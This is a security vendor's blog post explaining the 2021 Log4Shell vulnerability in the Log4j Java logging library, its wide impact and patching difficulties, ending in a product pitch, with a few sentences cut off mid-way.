At the end of 2021 a vulnerability was discovered on Log4j—a Java-based software that large organizations, including some of the world’s biggest tech firms, use to log information in their applications—that wreaked havoc on the internet on a global scale. Hackers were actively attempting to exploit the vulnerability by the minute.
“This vulnerability is one of the most serious that I’ve seen in my entire career, if not the most serious,” Jen Easterly, director of the US Cybersecurity and Infrastructure Security Agency (CISA), said on a phone call shared with CNN at the time.
In this blog, we’ll break down howit started, what the impact was, and what happens (or should happen) next.
The Inception: What is Log4j? Log4j is a Java logging library that logs messages of activities on a software or device. The powerful library can create simple logs and execute commands to create advanced logging and integrate with other components.
Log4j is widely used across consumer and enterprise systems, in everything from iCloud, Steam and Minecraft, to Fortinet, IBM, Microsoft, Red Hat, Salesforce, Siemens, and other major enterprises.
What is the Log4j vulnerability? Known as Log4Shell, it is a remote code execution (RCE) vulnerability that, if left unmitigated, enables a malicious threat actor to execute arbitrary Java code to take control of a target server. The troubling part is that it is easy to exploit and doesn’t require authentication.
And it gets worse.
The vulnerability can allow malicious actors to execute software or insert backdoors on systems to maintain persistent ongoing access.
Timeline of Events:
Log4j is a very ubiquitous Java logging library—it can be found in nearly everything written in Java or depends/relies on Java software. Some examples of major recognizable platforms impacted are Apple, Amazon, Google, Cloudflare, Twitter, and Minecraft.
Exploitation is simple and does not require authentication. For example, a bad actor
How Does It Work Exactly?
We may not be hearing as much about it in the news, but organizations are still struggling to identify and patch affected systems because of how pervasive the Log4j library is. Many organizations are still unpatched because of the complexity of updating software across multiple interdependent systems at once. Other organizations are relying on the fact that their affected systems are not directly exposed to the Internet to delay patching. However, those systems can still be targeted via other means and once compromised, create as big a threat as public systems.
It is estimated to impact hundreds of organizations and thousands of systems. That number continues to rise as researchers—and criminals—continue to scan the Internet for affected systems.
How Can Trava Help?
Trava’s comprehensive risk assessment platform can help in several areas:
Download Trava's Complete Guide to Vulnerability Scan types that details
Then schedule a demo to see Trava's vulnerability risk assessment tool in action.